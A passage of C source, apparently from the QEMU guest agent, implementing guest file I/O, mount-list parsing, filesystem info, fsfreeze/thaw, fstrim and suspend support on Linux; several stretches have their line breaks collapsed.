*path, bool has_mode, const char *mode, Error **errp) { FILE *fh; Error *local_err = NULL; int64_t handle; if (!has_mode) { mode = "r"; } slog("guest-file-open called, filepath: %s, mode: %s", path, mode); fh = safe_open_or_create(path, mode, &local_err); if (local_err != NULL) { error_propagate(errp, local_err); return -1; } /* set fd non-blocking to avoid common use cases (like reading from a * named pipe) from hanging the agent */ qemu_set_nonblock(fileno(fh)); handle = guest_file_handle_add(fh, errp); if (handle < 0) { fclose(fh); return -1; } slog("guest-file-open, handle: %" PRId64, handle); return handle; } void qmp_guest_file_close(int64_t handle, Error **errp) { GuestFileHandle *gfh = guest_file_handle_find(handle, errp); int ret; slog("guest-file-close called, handle: %" PRId64, handle); if (!gfh) { return; } ret = fclose(gfh->fh); if (ret == EOF) { error_setg_errno(errp, errno, "failed to close handle"); return; } QTAILQ_REMOVE(&guest_file_state.filehandles, gfh, next); g_free(gfh); } 
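
/*
 * Illustrative wire-level session for the file commands above, assuming
 * the default QGA JSON transport (the handle, path, and payload shown
 * are hypothetical):
 *
 *   -> {"execute": "guest-file-open",
 *       "arguments": {"path": "/tmp/example.txt", "mode": "r"}}
 *   <- {"return": 1000}
 *   -> {"execute": "guest-file-read",
 *       "arguments": {"handle": 1000, "count": 4096}}
 *   <- {"return": {"count": 12, "buf-b64": "aGVsbG8gd29ybGQK", "eof": true}}
 *   -> {"execute": "guest-file-close", "arguments": {"handle": 1000}}
 *   <- {"return": {}}
 */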
struct GuestFileRead *qmp_guest_file_read(int64_t handle, bool has_count, int64_t count, Error **errp) { GuestFileHandle *gfh = guest_file_handle_find(handle, errp); GuestFileRead *read_data = NULL; guchar *buf; FILE *fh; size_t read_count; if (!gfh) { return NULL; } if (!has_count) { count = QGA_READ_COUNT_DEFAULT; } else if (count < 0 || count >= UINT32_MAX) { error_setg(errp, "value '%" PRId64 "' is invalid for argument count", count); return NULL; } fh = gfh->fh; /* explicitly flush when switching from writing to reading */ if (gfh->state == RW_STATE_WRITING) { int ret = fflush(fh); if (ret == EOF) { error_setg_errno(errp, errno, "failed to flush file"); return NULL; } gfh->state = RW_STATE_NEW; } buf = g_malloc0(count+1); read_count = fread(buf, 1, count, fh); if (ferror(fh)) { error_setg_errno(errp, errno, "failed to read file"); slog("guest-file-read failed, handle: %" PRId64, handle); } else { buf[read_count] = 0; read_data = g_new0(GuestFileRead, 1); read_data->count = read_count; read_data->eof = feof(fh); if (read_count) { read_data->buf_b64 = g_base64_encode(buf, read_count); } gfh->state = RW_STATE_READING; } g_free(buf); clearerr(fh); return read_data; } GuestFileWrite *qmp_guest_file_write(int64_t handle, const char *buf_b64, bool has_count, int64_t count, Error **errp) { GuestFileWrite *write_data = NULL; guchar *buf; gsize buf_len; int write_count; GuestFileHandle *gfh = guest_file_handle_find(handle, errp); FILE *fh; if (!gfh) { return NULL; } fh = gfh->fh; if (gfh->state == RW_STATE_READING) { int ret = fseek(fh, 0, SEEK_CUR); if (ret == -1) { error_setg_errno(errp, errno, "failed to seek file"); return NULL; } gfh->state = RW_STATE_NEW; } buf = qbase64_decode(buf_b64, -1, &buf_len, errp); if (!buf) { return NULL; } if (!has_count) { count = buf_len; } else if (count < 0 || count > buf_len) { error_setg(errp, "value '%" PRId64 "' is invalid for argument count", count); g_free(buf); return NULL; } write_count = fwrite(buf, 1, count, fh); if (ferror(fh)) { error_setg_errno(errp, errno, "failed to write to file"); slog("guest-file-write failed, handle: %" PRId64, handle); } else { write_data = g_new0(GuestFileWrite, 1); write_data->count = write_count; write_data->eof = feof(fh); gfh->state = RW_STATE_WRITING; } g_free(buf); clearerr(fh); return write_data; } struct GuestFileSeek *qmp_guest_file_seek(int64_t handle, int64_t offset, GuestFileWhence *whence_code, Error **errp) { GuestFileHandle *gfh = guest_file_handle_find(handle, errp); GuestFileSeek *seek_data = NULL; FILE *fh; int ret; int whence; Error *err = NULL; if (!gfh) { return NULL; } /* We stupidly exposed 'whence':'int' in our qapi */ whence = ga_parse_whence(whence_code, &err); if (err) { error_propagate(errp, err); return NULL; } fh = gfh->fh; ret = fseek(fh, offset, whence); if (ret == -1) { error_setg_errno(errp, errno, "failed to seek file"); if (errno == ESPIPE) { /* file is non-seekable, stdio shouldn't be buffering anyways */ gfh->state = RW_STATE_NEW; } } else { seek_data = g_new0(GuestFileSeek, 1); seek_data->position = ftell(fh); seek_data->eof = feof(fh); gfh->state = RW_STATE_NEW; } clearerr(fh); return seek_data; } void qmp_guest_file_flush(int64_t handle, Error **errp) { GuestFileHandle *gfh = guest_file_handle_find(handle, errp); FILE *fh; int ret; if (!gfh) { return; } fh = gfh->fh; ret = fflush(fh); if (ret == EOF) { error_setg_errno(errp, errno, "failed to flush file"); } else { gfh->state = RW_STATE_NEW; } } /* linux-specific implementations. avoid this if at all possible. 
 */
#if defined(__linux__)

#if defined(CONFIG_FSFREEZE) || defined(CONFIG_FSTRIM)
typedef struct FsMount {
    char *dirname;
    char *devtype;
    unsigned int devmajor, devminor;
    QTAILQ_ENTRY(FsMount) next;
} FsMount;

typedef QTAILQ_HEAD(FsMountList, FsMount) FsMountList;

static void free_fs_mount_list(FsMountList *mounts)
{
    FsMount *mount, *temp;

    if (!mounts) {
        return;
    }

    QTAILQ_FOREACH_SAFE(mount, mounts, next, temp) {
        QTAILQ_REMOVE(mounts, mount, next);
        g_free(mount->dirname);
        g_free(mount->devtype);
        g_free(mount);
    }
}

static int dev_major_minor(const char *devpath,
                           unsigned int *devmajor, unsigned int *devminor)
{
    struct stat st;

    *devmajor = 0;
    *devminor = 0;

    if (stat(devpath, &st) < 0) {
        slog("failed to stat device file '%s': %s", devpath, strerror(errno));
        return -1;
    }
    if (S_ISDIR(st.st_mode)) {
        /* It is bind mount */
        return -2;
    }
    if (S_ISBLK(st.st_mode)) {
        *devmajor = major(st.st_rdev);
        *devminor = minor(st.st_rdev);
        return 0;
    }
    return -1;
}

/*
 * Walk the mount table and build a list of local file systems
 */
static void build_fs_mount_list_from_mtab(FsMountList *mounts, Error **errp)
{
    struct mntent *ment;
    FsMount *mount;
    char const *mtab = "/proc/self/mounts";
    FILE *fp;
    unsigned int devmajor, devminor;

    fp = setmntent(mtab, "r");
    if (!fp) {
        error_setg(errp, "failed to open mtab file: '%s'", mtab);
        return;
    }

    while ((ment = getmntent(fp))) {
        /*
         * An entry whose device name doesn't start with a '/' is
         * either a dummy file system or a network file system.
         * Add special handling for smbfs and cifs as is done by
         * coreutils as well.
         */
        if ((ment->mnt_fsname[0] != '/') ||
            (strcmp(ment->mnt_type, "smbfs") == 0) ||
            (strcmp(ment->mnt_type, "cifs") == 0)) {
            continue;
        }
        if (dev_major_minor(ment->mnt_fsname, &devmajor, &devminor) == -2) {
            /* Skip bind mounts */
            continue;
        }

        mount = g_new0(FsMount, 1);
        mount->dirname = g_strdup(ment->mnt_dir);
        mount->devtype = g_strdup(ment->mnt_type);
        mount->devmajor = devmajor;
        mount->devminor = devminor;

        QTAILQ_INSERT_TAIL(mounts, mount, next);
    }

    endmntent(fp);
}

static void decode_mntname(char *name, int len)
{
    int i, j = 0;
    for (i = 0; i <= len; i++) {
        if (name[i] != '\\') {
            name[j++] = name[i];
        } else if (name[i + 1] == '\\') {
            name[j++] = '\\';
            i++;
        } else if (name[i + 1] >= '0' && name[i + 1] <= '3' &&
                   name[i + 2] >= '0' && name[i + 2] <= '7' &&
                   name[i + 3] >= '0' && name[i + 3] <= '7') {
            name[j++] = (name[i + 1] - '0') * 64 +
                        (name[i + 2] - '0') * 8 +
                        (name[i + 3] - '0');
            i += 3;
        } else {
            name[j++] = name[i];
        }
    }
}

static void build_fs_mount_list(FsMountList *mounts, Error **errp)
{
    FsMount *mount;
    char const *mountinfo = "/proc/self/mountinfo";
    FILE *fp;
    char *line = NULL, *dash;
    size_t n;
    char check;
    unsigned int devmajor, devminor;
    int ret, dir_s, dir_e, type_s, type_e, dev_s, dev_e;

    fp = fopen(mountinfo, "r");
    if (!fp) {
        build_fs_mount_list_from_mtab(mounts, errp);
        return;
    }

    while (getline(&line, &n, fp) != -1) {
        ret = sscanf(line, "%*u %*u %u:%u %*s %n%*s%n%c",
                     &devmajor, &devminor, &dir_s, &dir_e, &check);
        if (ret < 3) {
            continue;
        }
        dash = strstr(line + dir_e, " - ");
        if (!dash) {
            continue;
        }
        ret = sscanf(dash, " - %n%*s%n %n%*s%n%c",
                     &type_s, &type_e, &dev_s, &dev_e, &check);
        if (ret < 1) {
            continue;
        }
        line[dir_e] = 0;
        dash[type_e] = 0;
        dash[dev_e] = 0;
        decode_mntname(line + dir_s, dir_e - dir_s);
        decode_mntname(dash + dev_s, dev_e - dev_s);
        if (devmajor == 0) {
            /* btrfs reports major number = 0 */
            if (strcmp("btrfs", dash + type_s) != 0 ||
                dev_major_minor(dash + dev_s, &devmajor, &devminor) < 0) {
                continue;
            }
        }

        mount = g_new0(FsMount, 1);
        mount->dirname =
g_strdup(line + dir_s); mount->devtype = g_strdup(dash + type_s); mount->devmajor = devmajor; mount->devminor = devminor; QTAILQ_INSERT_TAIL(mounts, mount, next); } free(line); fclose(fp); } #endif #if defined(CONFIG_FSFREEZE) static char *get_pci_driver(char const *syspath, int pathlen, Error **errp) { char *path; char *dpath; char *driver = NULL; char buf[PATH_MAX]; ssize_t len; path = g_strndup(syspath, pathlen); dpath = g_strdup_printf("%s/driver", path); len = readlink(dpath, buf, sizeof(buf) - 1); if (len != -1) { buf[len] = 0; driver = g_path_get_basename(buf); } g_free(dpath); g_free(path); return driver; } static int compare_uint(const void *_a, const void *_b) { unsigned int a = *(unsigned int *)_a; unsigned int b = *(unsigned int *)_b; return a < b ? -1 : a > b ? 1 : 0; } /* Walk the specified sysfs and build a sorted list of host or ata numbers */ static int build_hosts(char const *syspath, char const *host, bool ata, unsigned int *hosts, int hosts_max, Error **errp) { char *path; DIR *dir; struct dirent *entry; int i = 0; path = g_strndup(syspath, host - syspath); dir = opendir(path); if (!dir) { error_setg_errno(errp, errno, "opendir(\"%s\")", path); g_free(path); return -1; } while (i < hosts_max) { entry = readdir(dir); if (!entry) { break; } if (ata && sscanf(entry->d_name, "ata%d", hosts + i) == 1) { ++i; } else if (!ata && sscanf(entry->d_name, "host%d", hosts + i) == 1) { ++i; } } qsort(hosts, i, sizeof(hosts[0]), compare_uint); g_free(path); closedir(dir); return i; } /* Store disk device info specified by @sysfs into @fs */ static void build_guest_fsinfo_for_real_device(char const *syspath, GuestFilesystemInfo *fs, Error **errp) { unsigned int pci[4], host, hosts[8], tgt[3]; int i, nhosts = 0, pcilen; GuestDiskAddress *disk; GuestPCIAddress *pciaddr; GuestDiskAddressList *list = NULL; bool has_ata = false, has_host = false, has_tgt = false; char *p, *q, *driver = NULL; #ifdef CONFIG_LIBUDEV struct udev *udev = NULL; struct udev_device *udevice = NULL; #endif p = strstr(syspath, "/devices/pci"); if (!p || sscanf(p + 12, "%*x:%*x/%x:%x:%x.%x%n", pci, pci + 1, pci + 2, pci + 3, &pcilen) < 4) { g_debug("only pci device is supported: sysfs path '%s'", syspath); return; } p += 12 + pcilen; while (true) { driver = get_pci_driver(syspath, p - syspath, errp); if (driver && (g_str_equal(driver, "ata_piix") || g_str_equal(driver, "sym53c8xx") || g_str_equal(driver, "virtio-pci") || g_str_equal(driver, "ahci"))) { break; } g_free(driver); if (sscanf(p, "/%x:%x:%x.%x%n", pci, pci + 1, pci + 2, pci + 3, &pcilen) == 4) { p += pcilen; continue; } g_debug("unsupported driver or sysfs path '%s'", syspath); return; } p = strstr(syspath, "/target"); if (p && sscanf(p + 7, "%*u:%*u:%*u/%*u:%u:%u:%u", tgt, tgt + 1, tgt + 2) == 3) { has_tgt = true; } p = strstr(syspath, "/ata"); if (p) { q = p + 4; has_ata = true; } else { p = strstr(syspath, "/host"); q = p + 5; } if (p && sscanf(q, "%u", &host) == 1) { has_host = true; nhosts = build_hosts(syspath, p, has_ata, hosts, ARRAY_SIZE(hosts), errp); if (nhosts < 0) { goto cleanup; } } pciaddr = g_malloc0(sizeof(*pciaddr)); pciaddr->domain = pci[0]; pciaddr->bus = pci[1]; pciaddr->slot = pci[2]; pciaddr->function = pci[3]; disk = g_malloc0(sizeof(*disk)); disk->pci_controller = pciaddr; list = g_malloc0(sizeof(*list)); list->value = disk; #ifdef CONFIG_LIBUDEV udev = udev_new(); udevice = udev_device_new_from_syspath(udev, syspath); if (udev == NULL || udevice == NULL) { g_debug("failed to query udev"); } else { const char *devnode, *serial; 
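
        /* Fill in the optional device node (e.g. /dev/sda) and the
         * ID_SERIAL udev property, when udev can provide them. */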
devnode = udev_device_get_devnode(udevice); if (devnode != NULL) { disk->dev = g_strdup(devnode); disk->has_dev = true; } serial = udev_device_get_property_value(udevice, "ID_SERIAL"); if (serial != NULL && *serial != 0) { disk->serial = g_strdup(serial); disk->has_serial = true; } } #endif if (strcmp(driver, "ata_piix") == 0) { /* a host per ide bus, target*:0:<unit>:0 */ if (!has_host || !has_tgt) { g_debug("invalid sysfs path '%s' (driver '%s')", syspath, driver); goto cleanup; } for (i = 0; i < nhosts; i++) { if (host == hosts[i]) { disk->bus_type = GUEST_DISK_BUS_TYPE_IDE; disk->bus = i; disk->unit = tgt[1]; break; } } if (i >= nhosts) { g_debug("no host for '%s' (driver '%s')", syspath, driver); goto cleanup; } } else if (strcmp(driver, "sym53c8xx") == 0) { /* scsi(LSI Logic): target*:0:<unit>:0 */ if (!has_tgt) { g_debug("invalid sysfs path '%s' (driver '%s')", syspath, driver); goto cleanup; } disk->bus_type = GUEST_DISK_BUS_TYPE_SCSI; disk->unit = tgt[1]; } else if (strcmp(driver, "virtio-pci") == 0) { if (has_tgt) { /* virtio-scsi: target*:0:0:<unit> */ disk->bus_type = GUEST_DISK_BUS_TYPE_SCSI; disk->unit = tgt[2]; } else { /* virtio-blk: 1 disk per 1 device */ disk->bus_type = GUEST_DISK_BUS_TYPE_VIRTIO; } } else if (strcmp(driver, "ahci") == 0) { /* ahci: 1 host per 1 unit */ if (!has_host || !has_tgt) { g_debug("invalid sysfs path '%s' (driver '%s')", syspath, driver); goto cleanup; } for (i = 0; i < nhosts; i++) { if (host == hosts[i]) { disk->unit = i; disk->bus_type = GUEST_DISK_BUS_TYPE_SATA; break; } } if (i >= nhosts) { g_debug("no host for '%s' (driver '%s')", syspath, driver); goto cleanup; } } else { g_debug("unknown driver '%s' (sysfs path '%s')", driver, syspath); goto cleanup; } list->next = fs->disk; fs->disk = list; goto out; cleanup: if (list) { qapi_free_GuestDiskAddressList(list); } out: g_free(driver); #ifdef CONFIG_LIBUDEV udev_unref(udev); udev_device_unref(udevice); #endif return; } static void build_guest_fsinfo_for_device(char const *devpath, GuestFilesystemInfo *fs, Error **errp); /* Store a list of slave devices of virtual volume specified by @syspath into * @fs */ static void build_guest_fsinfo_for_virtual_device(char const *syspath, GuestFilesystemInfo *fs, Error **errp) { DIR *dir; char *dirpath; struct dirent *entry; dirpath = g_strdup_printf("%s/slaves", syspath); dir = opendir(dirpath); if (!dir) { if (errno != ENOENT) { error_setg_errno(errp, errno, "opendir(\"%s\")", dirpath); } g_free(dirpath); return; } for (;;) { errno = 0; entry = readdir(dir); if (entry == NULL) { if (errno) { error_setg_errno(errp, errno, "readdir(\"%s\")", dirpath); } break; } if (entry->d_type == DT_LNK) { char *path; g_debug(" slave device '%s'", entry->d_name); path = g_strdup_printf("%s/slaves/%s", syspath, entry->d_name); build_guest_fsinfo_for_device(path, fs, errp); g_free(path); if (*errp) { break; } } } g_free(dirpath); closedir(dir); } /* Dispatch to functions for virtual/real device */ static void build_guest_fsinfo_for_device(char const *devpath, GuestFilesystemInfo *fs, Error **errp) { char *syspath = realpath(devpath, NULL); if (!syspath) { error_setg_errno(errp, errno, "realpath(\"%s\")", devpath); return; } if (!fs->name) { fs->name = g_path_get_basename(syspath); } g_debug(" parse sysfs path '%s'", syspath); if (strstr(syspath, "/devices/virtual/block/")) { build_guest_fsinfo_for_virtual_device(syspath, fs, errp); } else { build_guest_fsinfo_for_real_device(syspath, fs, errp); } free(syspath); } /* Return a list of the disk device(s)' info which @mount 
lies on */ static GuestFilesystemInfo *build_guest_fsinfo(struct FsMount *mount, Error **errp) { GuestFilesystemInfo *fs = g_malloc0(sizeof(*fs)); struct statvfs buf; unsigned long used, nonroot_total, fr_size; char *devpath = g_strdup_printf("/sys/dev/block/%u:%u", mount->devmajor, mount->devminor); fs->mountpoint = g_strdup(mount->dirname); fs->type = g_strdup(mount->devtype); build_guest_fsinfo_for_device(devpath, fs, errp); if (statvfs(fs->mountpoint, &buf) == 0) { fr_size = buf.f_frsize; used = buf.f_blocks - buf.f_bfree; nonroot_total = used + buf.f_bavail; fs->used_bytes = used * fr_size; fs->total_bytes = nonroot_total * fr_size; fs->has_total_bytes = true; fs->has_used_bytes = true; } g_free(devpath); return fs; } GuestFilesystemInfoList *qmp_guest_get_fsinfo(Error **errp) { FsMountList mounts; struct FsMount *mount; GuestFilesystemInfoList *new, *ret = NULL; Error *local_err = NULL; QTAILQ_INIT(&mounts); build_fs_mount_list(&mounts, &local_err); if (local_err) { error_propagate(errp, local_err); return NULL; } QTAILQ_FOREACH(mount, &mounts, next) { g_debug("Building guest fsinfo for '%s'", mount->dirname); new = g_malloc0(sizeof(*ret)); new->value = build_guest_fsinfo(mount, &local_err); new->next = ret; ret = new; if (local_err) { error_propagate(errp, local_err); qapi_free_GuestFilesystemInfoList(ret); ret = NULL; break; } } free_fs_mount_list(&mounts); return ret; } typedef enum { FSFREEZE_HOOK_THAW = 0, FSFREEZE_HOOK_FREEZE, } FsfreezeHookArg; static const char *fsfreeze_hook_arg_string[] = { "thaw", "freeze", }; static void execute_fsfreeze_hook(FsfreezeHookArg arg, Error **errp) { int status; pid_t pid; const char *hook; const char *arg_str = fsfreeze_hook_arg_string[arg]; Error *local_err = NULL; hook = ga_fsfreeze_hook(ga_state); if (!hook) { return; } if (access(hook, X_OK) != 0) { error_setg_errno(errp, errno, "can't access fsfreeze hook '%s'", hook); return; } slog("executing fsfreeze hook with arg '%s'", arg_str); pid = fork(); if (pid == 0) { setsid(); reopen_fd_to_null(0); reopen_fd_to_null(1); reopen_fd_to_null(2); execle(hook, hook, arg_str, NULL, environ); _exit(EXIT_FAILURE); } else if (pid < 0) { error_setg_errno(errp, errno, "failed to create child process"); return; } ga_wait_child(pid, &status, &local_err); if (local_err) { error_propagate(errp, local_err); return; } if (!WIFEXITED(status)) { error_setg(errp, "fsfreeze hook has terminated abnormally"); return; } status = WEXITSTATUS(status); if (status) { error_setg(errp, "fsfreeze hook has failed with status %d", status); return; } } /* * Return status of freeze/thaw */ GuestFsfreezeStatus qmp_guest_fsfreeze_status(Error **errp) { if (ga_is_frozen(ga_state)) { return GUEST_FSFREEZE_STATUS_FROZEN; } return GUEST_FSFREEZE_STATUS_THAWED; } int64_t qmp_guest_fsfreeze_freeze(Error **errp) { return qmp_guest_fsfreeze_freeze_list(false, NULL, errp); } /* * Walk list of mounted file systems in the guest, and freeze the ones which * are real local file systems. 
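 * If a list of mountpoints is given, only those mounts are frozen; the
 * return value is the number of file systems actually frozen.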
*/ int64_t qmp_guest_fsfreeze_freeze_list(bool has_mountpoints, strList *mountpoints, Error **errp) { int ret = 0, i = 0; strList *list; FsMountList mounts; struct FsMount *mount; Error *local_err = NULL; int fd; slog("guest-fsfreeze called"); execute_fsfreeze_hook(FSFREEZE_HOOK_FREEZE, &local_err); if (local_err) { error_propagate(errp, local_err); return -1; } QTAILQ_INIT(&mounts); build_fs_mount_list(&mounts, &local_err); if (local_err) { error_propagate(errp, local_err); return -1; } /* cannot risk guest agent blocking itself on a write in this state */ ga_set_frozen(ga_state); QTAILQ_FOREACH_REVERSE(mount, &mounts, FsMountList, next) { /* To issue fsfreeze in the reverse order of mounts, check if the * mount is listed in the list here */ if (has_mountpoints) { for (list = mountpoints; list; list = list->next) { if (strcmp(list->value, mount->dirname) == 0) { break; } } if (!list) { continue; } } fd = qemu_open(mount->dirname, O_RDONLY); if (fd == -1) { error_setg_errno(errp, errno, "failed to open %s", mount->dirname); goto error; } /* we try to cull filesystems we know won't work in advance, but other * filesystems may not implement fsfreeze for less obvious reasons. * these will report EOPNOTSUPP. we simply ignore these when tallying * the number of frozen filesystems. * if a filesystem is mounted more than once (aka bind mount) a * consecutive attempt to freeze an already frozen filesystem will * return EBUSY. * * any other error means a failure to freeze a filesystem we * expect to be freezable, so return an error in those cases * and return system to thawed state. */ ret = ioctl(fd, FIFREEZE); if (ret == -1) { if (errno != EOPNOTSUPP && errno != EBUSY) { error_setg_errno(errp, errno, "failed to freeze %s", mount->dirname); close(fd); goto error; } } else { i++; } close(fd); } free_fs_mount_list(&mounts); /* We may not issue any FIFREEZE here. * Just unset ga_state here and ready for the next call. */ if (i == 0) { ga_unset_frozen(ga_state); } return i; error: free_fs_mount_list(&mounts); qmp_guest_fsfreeze_thaw(NULL); return 0; } /* * Walk list of frozen file systems in the guest, and thaw them. */ int64_t qmp_guest_fsfreeze_thaw(Error **errp) { int ret; FsMountList mounts; FsMount *mount; int fd, i = 0, logged; Error *local_err = NULL; QTAILQ_INIT(&mounts); build_fs_mount_list(&mounts, &local_err); if (local_err) { error_propagate(errp, local_err); return 0; } QTAILQ_FOREACH(mount, &mounts, next) { logged = false; fd = qemu_open(mount->dirname, O_RDONLY); if (fd == -1) { continue; } /* we have no way of knowing whether a filesystem was actually unfrozen * as a result of a successful call to FITHAW, only that if an error * was returned the filesystem was *not* unfrozen by that particular * call. * * since multiple preceding FIFREEZEs require multiple calls to FITHAW * to unfreeze, continuing issuing FITHAW until an error is returned, * in which case either the filesystem is in an unfreezable state, or, * more likely, it was thawed previously (and remains so afterward). * * also, since the most recent successful call is the one that did * the actual unfreeze, we can use this to provide an accurate count * of the number of filesystems unfrozen by guest-fsfreeze-thaw, which * may * be useful for determining whether a filesystem was unfrozen * during the freeze/thaw phase by a process other than qemu-ga. 
*/ do { ret = ioctl(fd, FITHAW); if (ret == 0 && !logged) { i++; logged = true; } } while (ret == 0); close(fd); } ga_unset_frozen(ga_state); free_fs_mount_list(&mounts); execute_fsfreeze_hook(FSFREEZE_HOOK_THAW, errp); return i; } static void guest_fsfreeze_cleanup(void) { Error *err = NULL; if (ga_is_frozen(ga_state) == GUEST_FSFREEZE_STATUS_FROZEN) { qmp_guest_fsfreeze_thaw(&err); if (err) { slog("failed to clean up frozen filesystems: %s", error_get_pretty(err)); error_free(err); } } } #endif /* CONFIG_FSFREEZE */ #if defined(CONFIG_FSTRIM) /* * Walk list of mounted file systems in the guest, and trim them. */ GuestFilesystemTrimResponse * qmp_guest_fstrim(bool has_minimum, int64_t minimum, Error **errp) { GuestFilesystemTrimResponse *response; GuestFilesystemTrimResultList *list; GuestFilesystemTrimResult *result; int ret = 0; FsMountList mounts; struct FsMount *mount; int fd; Error *local_err = NULL; struct fstrim_range r; slog("guest-fstrim called"); QTAILQ_INIT(&mounts); build_fs_mount_list(&mounts, &local_err); if (local_err) { error_propagate(errp, local_err); return NULL; } response = g_malloc0(sizeof(*response)); QTAILQ_FOREACH(mount, &mounts, next) { result = g_malloc0(sizeof(*result)); result->path = g_strdup(mount->dirname); list = g_malloc0(sizeof(*list)); list->value = result; list->next = response->paths; response->paths = list; fd = qemu_open(mount->dirname, O_RDONLY); if (fd == -1) { result->error = g_strdup_printf("failed to open: %s", strerror(errno)); result->has_error = true; continue; } /* We try to cull filesystems we know won't work in advance, but other * filesystems may not implement fstrim for less obvious reasons. * These will report EOPNOTSUPP; while in some other cases ENOTTY * will be reported (e.g. CD-ROMs). * Any other error means an unexpected error. */ r.start = 0; r.len = -1; r.minlen = has_minimum ? minimum : 0; ret = ioctl(fd, FITRIM, &r); if (ret == -1) { result->has_error = true; if (errno == ENOTTY || errno == EOPNOTSUPP) { result->error = g_strdup("trim not supported"); } else { result->error = g_strdup_printf("failed to trim: %s", strerror(errno)); } close(fd); continue; } result->has_minimum = true; result->minimum = r.minlen; result->has_trimmed = true; result->trimmed = r.len; close(fd); } free_fs_mount_list(&mounts); return response; } #endif /* CONFIG_FSTRIM */ #define LINUX_SYS_STATE_FILE "/sys/power/state" #define SUSPEND_SUPPORTED 0 #define SUSPEND_NOT_SUPPORTED 1 typedef enum { SUSPEND_MODE_DISK = 0, SUSPEND_MODE_RAM = 1, SUSPEND_MODE_HYBRID = 2, } SuspendMode; /* * Executes a command in a child process using g_spawn_sync, * returning an int >= 0 representing the exit status of the * process. * * If the program wasn't found in path, returns -1. * * If a problem happened when creating the child process, * returns -1 and errp is set. 
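 *
 * Example (hypothetical command):
 *   const char *cmd[] = {"systemctl", "status", "systemd-suspend", NULL};
 *   int status = run_process_child(cmd, errp);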
*/ static int run_process_child(const char *command[], Error **errp) { int exit_status, spawn_flag; GError *g_err = NULL; bool success; spawn_flag = G_SPAWN_SEARCH_PATH | G_SPAWN_STDOUT_TO_DEV_NULL | G_SPAWN_STDERR_TO_DEV_NULL; success = g_spawn_sync(NULL, (char **)command, environ, spawn_flag, NULL, NULL, NULL, NULL, &exit_status, &g_err); if (success) { return WEXITSTATUS(exit_status); } if (g_err && (g_err->code != G_SPAWN_ERROR_NOENT)) { error_setg(errp, "failed to create child process, error '%s'", g_err->message); } g_error_free(g_err); return -1; } static bool systemd_supports_mode(SuspendMode mode, Error **errp) { Error *local_err = NULL; const char *systemctl_args[3] = {"systemd-hibernate", "systemd-suspend", "systemd-hybrid-sleep"}; const char *cmd[4] = {"systemctl", "status", systemctl_args[mode], NULL}; int status; status = run_process_child(cmd, &local_err); /* * systemctl status uses LSB return codes so we can expect * status > 0 and be ok. To assert if the guest has support * for the selected suspend mode, status should be < 4. 4 is * the code for unknown service status, the return value when * the service does not exist. A common value is status = 3 * (program is not running). */ if (status > 0 && status < 4) { return true; } if (local_err) { error_propagate(errp, local_err); } return false; } static void systemd_suspend(SuspendMode mode, Error **errp) { Error *local_err = NULL; const char *systemctl_args[3] = {"hibernate", "suspend", "hybrid-sleep"}; const char *cmd[3] = {"systemctl", systemctl_args[mode], NULL}; int status; status = run_process_child(cmd, &local_err); if (status == 0) { return; } if ((status == -1) && !local_err) { error_setg(errp, "the helper program 'systemctl %s' was not found", systemctl_args[mode]); return; } if (local_err) { error_propagate(errp, local_err); } else { error_setg(errp, "the helper program 'systemctl %s' returned an " "unexpected exit status code (%d)", systemctl_args[mode], status); } } static bool pmutils_supports_mode(SuspendMode mode, Error **errp) { Error *local_err = NULL; const char *pmutils_args[3] = {"--hibernate", "--suspend", "--suspend-hybrid"}; const char *cmd[3] = {"pm-is-supported", pmutils_args[mode], NULL}; int status; status = run_process_child(cmd, &local_err); if (status == SUSPEND_SUPPORTED) { return true; } if ((status == -1) && !local_err) { return false; } if (local_err) { error_propagate(errp, local_err); } else { error_setg(errp, "the helper program '%s' returned an unexpected exit" " status code (%d)", "pm-is-supported", status); } return false; } static void pmutils_suspend(SuspendMode mode, Error **errp) { Error *local_err = NULL; const char *pmutils_binaries[3] = {"pm-hibernate", "pm-suspend", "pm-suspend-hybrid"}; const char *cmd[2] = {pmutils_binaries[mode], NULL}; int status; status = run_process_child(cmd, &local_err); if (status == 0) { return; } if ((status == -1) && !local_err) { error_setg(errp, "the helper program '%s' was not found", pmutils_binaries[mode]); return; } if (local_err) { error_propagate(errp, local_err); } else { error_setg(errp, "the helper program '%s' returned an unexpected exit" " status code (%d)", pmutils_binaries[mode], status); } } static bool linux_sys_state_supports_mode(SuspendMode mode, Error **errp) { const char *sysfile_strs[3] = {"disk", "mem", NULL}; const char *sysfile_str = sysfile_strs[mode]; char buf[32]; /* hopefully big enough */ int fd; ssize_t ret; if (!sysfile_str) { error_setg(errp, "unknown guest suspend mode"); return false; } fd = 
open(LINUX_SYS_STATE_FILE, O_RDONLY);
    if (fd < 0) {
        return false;
    }

    ret = read(fd, buf, sizeof(buf) - 1);
    close(fd);
    if (ret <= 0) {
        return false;
    }
    buf[ret] = '\0';

    if (strstr(buf, sysfile_str)) {
        return true;
    }
    return false;
}

static void linux_sys_state_suspend(SuspendMode mode, Error **errp)
{
    Error *local_err = NULL;
    const char *sysfile_strs[3] = {"disk", "mem", NULL};
    const char *sysfile_str = sysfile_strs[mode];
    pid_t pid;
    int status;

    if (!sysfile_str) {
        error_setg(errp, "unknown guest suspend mode");
        return;
    }

    pid = fork();
    if (!pid) {
        /* child */
        int fd;

        setsid();
        reopen_fd_to_null(0);
        reopen_fd_to_null(1);
        reopen_fd_to_null(2);

        fd = open(LINUX_SYS_STATE_FILE, O_WRONLY);
        if (fd < 0) {
            _exit(EXIT_FAILURE);
        }

        if (write(fd, sysfile_str, strlen(sysfile_str)) < 0) {
            _exit(EXIT_FAILURE);
        }

        _exit(EXIT_SUCCESS);
    } else if (pid < 0) {
        error_setg_errno(errp, errno, "failed to create child process");
        return;
    }

    ga_wait_child(pid, &status, &local_err);
    if (local_err) {
        error_propagate(errp, local_err);
        return;
    }

    if (WEXITSTATUS(status)) {
        error_setg(errp, "child process has failed to suspend");
    }
}

static void guest_suspend(SuspendMode mode, Error **errp)
{
    Error *local_err = NULL;
    bool mode_supported = false;

    if (systemd_supports_mode(mode, &local_err)) {
        mode_supported = true;
        systemd_suspend(mode, &local_err);

        if (!local_err) {
            return;
        }
    }

    /* reset local_err after freeing it: reusing a freed, non-NULL Error
     * pointer would trip the assertion in error_setv() on the next probe */
    error_free(local_err);
    local_err = NULL;

    if (pmutils_supports_mode(mode, &local_err)) {
        mode_supported = true;
        pmutils_suspend(mode, &local_err);

        if (!local_err) {
            return;
        }
    }

    error_free(local_err);
    local_err = NULL;

    if (linux_sys_state_supports_mode(mode, &local_err)) {
        mode_supported = true;
        linux_sys_state_suspend(mode, &local_err);
    }

    if (!mode_supported) {
        error_free(local_err);
        error_setg(errp,
